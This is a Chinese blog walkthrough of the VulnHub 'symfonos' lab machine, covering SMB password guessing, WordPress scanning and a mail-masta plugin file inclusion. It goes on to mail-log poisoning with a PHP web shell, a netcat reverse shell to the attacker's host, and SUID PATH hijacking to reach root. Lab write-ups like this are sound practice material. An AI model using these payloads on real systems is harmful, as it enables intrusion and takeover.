symfonos
日常练习
0x01 信息收集
老规矩,信息收集,用 nmap 扫。
192.168.56.3
存活。因为80端口开着,浏览器打开看看。
页面上没有什么有价值的信息,于是尝试路径爆破。
dirsearch -u 192.168.56.3
[10:13:48] 301 - 313B - /manual -> http://192.168.56.3/manual/
[10:13:48] 200 - 201B - /manual/index.htm
扫到了个manual
目录,应该是apache2的主页,到这里还是没有什么关键的信息。
于是想到的刚刚nmap扫出来的端口还有445端口开放,尝试登陆smb。
0x02 SMB登录
在windows上键入\\192.168.56.3
,就可以看到它开放的共享文件夹。
有两个目录,第二个需要账户密码,先看看第一个。
有一个attention.txt文件。内容如下:
Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!
Next person I find using one of these passwords will be fired!
-Zeus
主要是说不要用epidioko\qwerty\baseball
,这三个字符串当账户密码,到这里可以猜测刚刚第二个文件夹,应该是用到了这三个密码中的其中一个,账户应该就是目录名 helios。
heliros
qwerty
经过尝试也是看到了目录下的一些文件。
research.txt文件下没有什么有用的,todo.txt的内容如下:
1. Binge watch Dexter
2. Dance
3. Work on /h3l105
关键信息h3l105,这是网站的路径,访问看看
0x03 漏洞查找
这是一个WordPress搭建的博客网站(因为这里网站没搜集到什么信息),可以利用wpscan扫一下漏洞。因为网站与symfonos.local
这个域名是有绑定的,所以需要去hosts文件里进行DNS绑定(具体这里就不阐述)。
wpscan --url http://symfonos.local/h3l105/
这里是借助kali用wpscan扫描,windows的环境没配置好先将就吧。
扫出来的结果里插件部分是有两个,mail-masta
和site-editor
,可以利用searchsploit来查找这两个插件的漏洞。
mail-masta
site-editor
先看看mail-masta这个插件的吧,他是存在LFI和SQL注入的,可以先试试LFI。
0x04 文件包含
将利用文件复制到当前目录下
searchsploit -m php/webapps/40290.txt
查看一下40290.txt
文件(这里是直接把payload给粘贴过来了)
http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
尝试文件包含
成功了,看看能不能包含日志文件
pl=/var/log/apache2/error.log
pl=/var/log/apache2/access.log
发现都是没有内容的
正当没有头绪的时候突然想到一开始nmap扫到了一个25端口,于是百度后知道了可以利用邮件日志文件写入一句话木马。原理就是发送一份带有一句话木马的邮件,然后邮件日志文件就会记录下,再利用文件包含去包含邮件日志文件,就可以达到rce的效果。
邮件日志文件是在(因为用户名是helios)
pl=/var/mail/helios
包含成功!!
0x05 写入木马
那么要如何写入shell呢?利用telnet发送邮件telnet 192.168.56.3 25
然后粘贴如下文本
MAIL FROM: y2xsec
RCPT TO: helios
data
<?php system($_GET['cmd']); ?>
.
QUIT
ok,已经写入了,现在去网站试试能不能执行命令。
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=ls
因为页面不好看出来,这是源代码里面显示的内容。
发现是可以执行命令的,那么就可以尝试反弹shell。
0x06 反弹shell
在本地执行nc监听
nc -lvvp 2333
浏览器执行
symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&cmd=nc%20192.168.56.1%202333%20-e%20/bin/bash
成功反弹shell。
0x07 提升权限
可以看到当前的一个用户是heliros
查看一下有没有可以suid提权的命令
可以看到有一个可疑的可执行文件:statuscheck
,执行看看
这应该是返回网页的一个状态情况,看看调用了什么命令
这里调用了curl命令,那么思路就有了:可以构造一个假的curl,然后利用statuscheck去调用假的curl,达到一个提权的效果。
cd /tmp
echo "/bin/bash" > curl
chmod 777 ./curl
export PATH=/tmp:$PATH
/opt/statuscheck
执行成功!!
看看/root
目录下有什么
成功拿到flag,完结。
0x08 总结
学到很多东西,像可以往邮件日志里写入一句话木马,这个是没有想到的。
标签:helios,masta,文件,symfonos,vulnhub,mail,pl From: https://www.cnblogs.com/y2xsec/p/17932259.html